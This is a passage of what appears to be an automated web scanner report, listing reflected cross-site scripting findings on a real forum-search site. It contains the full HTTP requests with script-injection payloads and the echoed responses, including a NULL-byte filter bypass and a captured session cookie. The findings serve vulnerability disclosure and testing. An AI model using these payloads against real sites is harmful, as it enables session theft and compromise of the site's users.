       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1">
...[SNIP]...

4.90. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:53 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:09 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1">
...[SNIP]...

4.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:22 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.92. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ratedesi.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1">
...[SNIP]...

4.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ratedesi.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f15'-alert(1)-'e30e737b55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/ratedesi.com?d8f15'-alert(1)-'e30e737b55a=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:54:06 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:54:08 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ratedesi.com&d8f15'-alert(1)-'e30e737b55a=1&p=30&d=1288940048&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.94. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/sherdog.net

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fd25'-alert(1)-'46ee574fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/sherdog.net?3fd25'-alert(1)-'46ee574fc5=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:27 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:29 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=sherdog.net&3fd25'-alert(1)-'46ee574fc5=1&p=30&d=1288940009&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.95. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/sherdog.net

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c1b"><script>alert(1)</script>c6dc46feb64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:15 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:17 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1">
...[SNIP]...

4.96. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ufc.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be3e'-alert(1)-'8c796450d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/ufc.com?2be3e'-alert(1)-'8c796450d60=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:13 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:15 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ufc.com&2be3e'-alert(1)-'8c796450d60=1&p=30&d=1288939995&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.97. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ufc.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b68"><script>alert(1)</script>31e4bcbef97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:46 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1">
...[SNIP]...

4.98. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/websitetoolbox.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f166'-alert(1)-'182d880e185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/websitetoolbox.com?3f166'-alert(1)-'182d880e185=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:17 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=websitetoolbox.com&3f166'-alert(1)-'182d880e185=1&p=30&d=1288940011&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.99. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/websitetoolbox.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2db"><script>alert(1)</script>3a4a3e5c070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:32 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:34 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1">
...[SNIP]...

4.100. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/worldmastiffforum.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bbef'-alert(1)-'5ee0da9ec64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/worldmastiffforum.com?4bbef'-alert(1)-'5ee0da9ec64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=worldmastiffforum.com&4bbef'-alert(1)-'5ee0da9ec64=1&p=30&d=1288939970&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.101. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/worldmastiffforum.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c581"><script>alert(1)</script>99d3eb93754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:21 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:30 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1">
...[SNIP]...

4.102. http://boardreader.com/index.php [ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The value of the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004177f"><script>alert(1)</script>0da953a680a was submitted in the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter. This input was echoed as 4177f"><script>alert(1)</script>0da953a680a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
<A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext">
...[SNIP]...

4.103. http://boardreader.com/index.php [extended_search parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The value of the extended_search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 484f3"><script>alert(1)</script>8c7809fc22a was submitted in the extended_search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
lick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext">
...[SNIP]...

4.104. http://boardreader.com/index.php [ltype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The value of the ltype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b85f1"><script>alert(1)</script>8330a287d66 was submitted in the ltype parameter. This input was echoed as b85f1"><script>alert(1)</script>8330a287d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
"./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66">
...[SNIP]...

4.105. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87160"><script>alert(1)</script>04f67b98015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

